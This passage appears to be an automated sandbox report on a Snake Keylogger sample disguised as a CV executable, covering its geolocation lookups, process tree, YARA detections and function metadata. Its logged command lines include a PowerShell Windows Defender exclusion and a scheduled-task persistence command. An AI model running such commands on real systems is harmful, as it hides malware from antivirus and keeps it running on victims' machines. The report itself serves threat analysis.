2024-11-18 17:21:37 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:36 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 564 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQa4CaraNaU60vrjdwmGpNzL3LX8BaZqlbXdqW3fLEgKEqaNan0QWEl%2FoBNhS%2Fvfa2F6RSdJ2kPzK3PdQ1IQZc0RYIaQo%2FLoJRjl9%2BDwToC3dmpdULHH%2FVt2hbP5MbDQtx8ZwWD%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a34dd974eaff-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=122748&cwnd=32&unsent_bytes=0&cid=03bd0d7a8b8fed92&ts=173&x=0"
2024-11-18 17:21:37 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49773	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:38 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:38 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:38 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 566 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEnhygAOPA7AEklvdIs5Urc9QsjU2Bn4rvRUipB8xVqz%2FCh26aJT5LssxNPtj7H%2B90ox5tvT0jgAulK%2FeIJXcEoul5xFuVOYpik%2Fl20%2BEtng7trkTLLz%2B9satmBB%2FXyjD9j%2FogLM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a358de5b2c1d-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24301&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=119329&cwnd=32&unsent_bytes=0&cid=037a2fcaf69fc991&ts=174&x=0"
2024-11-18 17:21:38 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49784	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:40 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:40 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:40 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51974 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2s1wWq4z9YPq6w%2F98hifRYF%2Bk7vLRIe5l%2F85KN%2B7R1Mq2e%2BdKns9nMgj8KUF5Eo0EvOajcD1%2Fd2iUGFv9Wmabd1dPQKG60vzExhetJr8hsZk9Ybx8s8vrQb7IDX8z9VxhKI1z4Yd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a3637a5de76d-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=154899&cwnd=32&unsent_bytes=0&cid=65a1e79055a24291&ts=161&x=0"
2024-11-18 17:21:40 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49796	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:42 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:42 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:42 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51976 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Am3ODeEBehNs9VEbRhtF3pG5QTUSsnrd9%2Beefu2m859WbJWjq1wMH03upaW9m0oCPNNXms331PriXy%2F2Xq1rfg3dqTWyhDb1PI2ix6q7NlT2Z8KCexEgrsFnYsrHsoxy4vC4aTXX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a36e0ed5e759-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18895&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152758&cwnd=32&unsent_bytes=0&cid=0ffcd3b04f188597&ts=168&x=0"
2024-11-18 17:21:42 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	12:21:10
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\Kayla Dennis CV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Kayla Dennis CV.exe"
Imagebase:	0xff0000
File size:	634'888 bytes
MD5 hash:	8F6D690E119684B1629D41F97B83FB23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:21:16
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
Imagebase:	0xc10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:21:16
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:21:16
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
Imagebase:	0xc10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"
Imagebase:	0xfb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x160000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:21:17
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	12:21:18
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
Imagebase:	0xae0000
File size:	634'888 bytes
MD5 hash:	8F6D690E119684B1629D41F97B83FB23
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:21:19
Start date:	18/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:21:27
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"
Imagebase:	0xfb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:21:27
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:21:27
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x7e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	167
Total number of Limit Nodes:	13

Executed Functions

Function 0B1D1F58 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e2f3d3c4ef33b033efee372a4535a6f4622381c9a4461c7ba723d31ac97143
Instruction ID: 76b3a9b397b816966c8759e37f127ca1e2dc242be06df47fdb6133ee3c5dd67a
Opcode Fuzzy Hash: e8e2f3d3c4ef33b033efee372a4535a6f4622381c9a4461c7ba723d31ac97143
Instruction Fuzzy Hash: 27E1F1317016049FEB29DF79C460BAEBBFAAF88301F54846DD556DB290CB39E901CB91

Function 07D73033 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea163cd972f625b53683778355f6148beb61c4f29c9076318e6694bbf035be9a
Instruction ID: 5ecd1fbe2a9d4657928f419e5166f854e67f2cb9ffbbe7a1f170d2dff47b5a96
Opcode Fuzzy Hash: ea163cd972f625b53683778355f6148beb61c4f29c9076318e6694bbf035be9a
Instruction Fuzzy Hash: CCC191B4E042598FDB14CFA9C980A9DFBF2BF89300F24956AD819E7315EB319941DF50

Function 0B1D046F Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8784af9d5fdb0b0894f21aed84b55380628dc5dc490016c17c3cf3f93c52ce
Instruction ID: 858a8a36a3532a67cbbaa4964729d65ac737cb0f216e02842fc431e1870f19da
Opcode Fuzzy Hash: 8f8784af9d5fdb0b0894f21aed84b55380628dc5dc490016c17c3cf3f93c52ce
Instruction Fuzzy Hash: 54A0018898F65CC58008182400AACB9C2AE9A0FC08E527204852F324069A50C141842E

Function 018AE398 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 018AE416
GetCurrentThread.KERNEL32 ref: 018AE453
GetCurrentProcess.KERNEL32 ref: 018AE490
GetCurrentThreadId.KERNEL32 ref: 018AE4E9

Memory Dump Source

Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 12a9510607344eab96668c1f927030cbcbfd13ca98bda9994b90b2d9ca212884
Instruction ID: 6c5edf69b677df9b22f8645f4094fe4f35b799607852b01573589996dd245179
Opcode Fuzzy Hash: 12a9510607344eab96668c1f927030cbcbfd13ca98bda9994b90b2d9ca212884
Instruction Fuzzy Hash: BA5176B09016498FEB14DFA9D588BAEBFF5FF48300F208419E519A7360DB38A944CF65

Function 07D7CBD5 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07D7CE16

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9dbe7e43c7dc2484bbf48b82eca8582d71a2358365b180a607188c94fdb4b047
Instruction ID: a7789f2f592044de8ac1cd4231b3e6285b7a0767a87aa358a157254a6c21bd00
Opcode Fuzzy Hash: 9dbe7e43c7dc2484bbf48b82eca8582d71a2358365b180a607188c94fdb4b047
Instruction Fuzzy Hash: 3CA160B1D1061ACFDB20DF68C8817DDFBB6BF48310F148569D809A7294EB749985CFA1

Function 07D7CBE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07D7CE16

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2689b1a55e0ca8a65de571f351c57d7ad2a23f4027733f7f5772332d14b8508f
Instruction ID: a792aeed0785ae9e73d53cc7f33d5c29b96aa223fe92e9e6c142933bd4dab88b
Opcode Fuzzy Hash: 2689b1a55e0ca8a65de571f351c57d7ad2a23f4027733f7f5772332d14b8508f
Instruction Fuzzy Hash: EE916EB1D1061ACFDB20DF68C8817EDFBB6BF48310F148569D809A7294EB749985CFA1

Function 018A44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018A59A9

Memory Dump Source

Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7e79abee387dfbd5bc5cf845429d25d735d5ee6782885055df4f9baad473d412
Instruction ID: 6725c75f7fde8e33716620ea6c6ff9d8d3c7e3b6bad23699e6b38e3d3c6456e4
Opcode Fuzzy Hash: 7e79abee387dfbd5bc5cf845429d25d735d5ee6782885055df4f9baad473d412
Instruction Fuzzy Hash: 6A4115B0C0071DCBDB24DF99C884B9DBBF5BF48304F64805AD408AB255DB756949CF90

Function 018A58EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018A59A9

Memory Dump Source

Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cf5bfa0eec6ec7316ba7232dca6d923795a646e89d4ff78b7c97db6afe89508d
Instruction ID: 98c113d5c8c104df43b518455b93ed404c8373496f18f7da6c480bfdee17dc9b
Opcode Fuzzy Hash: cf5bfa0eec6ec7316ba7232dca6d923795a646e89d4ff78b7c97db6afe89508d
Instruction Fuzzy Hash: 8141F2B1D00719CFEB24CFA9C984B8DBBF5BF49304F24805AD418AB255DB75698ACF90

Function 0B1D12E0 Relevance: 1.6, APIs: 1, Instructions: 75
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD

Memory Dump Source

Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ec4f2297bbcc19ba8b80f0d09630d97940a82055fedf5a4f908e307bca7a7fa9
